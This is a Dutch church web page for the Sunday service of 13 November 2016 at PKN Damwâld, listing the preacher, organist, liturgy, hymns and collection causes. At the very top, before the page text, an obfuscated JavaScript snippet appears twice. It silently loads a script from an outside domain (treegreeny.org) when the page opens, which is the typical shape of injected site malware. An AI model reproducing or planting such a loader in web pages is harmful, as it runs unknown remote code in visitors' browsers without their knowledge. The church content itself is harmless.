;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 13 november 2016 9:30 uur - PKN Damwâld
zondag 13 november 2016
09:30 uur

Kerkdienst zondag 13 november 2016 9:30 uur

vg_-01

Informatie

Voorganger:Proponent A.H. Cluistra- Boschloo, Hoogeveen
Organist:Nienke van der Heide-Visser
Liturgie
We zingen: Elb 241
Welkom en Mededelingen
We zingen: Psalm 25 : 1, 2 en 4
Stil gebed Bemoediging en groet
We zingen: Psalm 25 : 7 en 10
Toenaderingsgebed
We zingen: ELB 308: 1 en 2
Leefregel van God: Ef. 4:25 - 5:1
We zingen: ELB 308: 3 en 4
Gebed bij de opening van het Woord
1e Schriftlezing: Jona 3 : 1 - 10
We zingen: Gezang 473: 1, 2 en 3
2de Schriftlezing: 1 Joh. 4: 19-21
Gezang 473: 5, 7, 9 en 10
Verkondiging
We zingen: Elb 212
Dankgebed en voorbeden
Collecte
We zingen: Gezang 481: 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Binnenlands Diaconaat: Steun mensen in een sociaal isolement

Mensen die eenzaam zijn, schulden hebben of verslaafd zijn, voelen zich vaak alleen staan. Het Interkerkelijk Diaconaal Overleg in Lelystad zet zich, met steun van Kerk in Actie, in voor deze mensen. Inloopcentrum Waterwijk is er bijvoorbeeld voor wie op zoek is naar warmte en steun. Men kan er terecht voor een kopje koffie, een praatje, een warme maaltijd of naailes. In inloophuis Open Haven krijgen mensen met verslavingsproblemen voorlichting en advies en kunnen ze vier keer per week aanschuiven voor een warme maaltijd. Ook is er een voedselbank en schuldhulpverlening voor mensen met financiële problemen. Vandaag collecteren we voor het diaconale werk in Nederland, zoals dat van het Interkerkelijke Diaconaal Overleg in Lelystad.

Tweede collecte: Kerk
Uitganscollecte: Kerk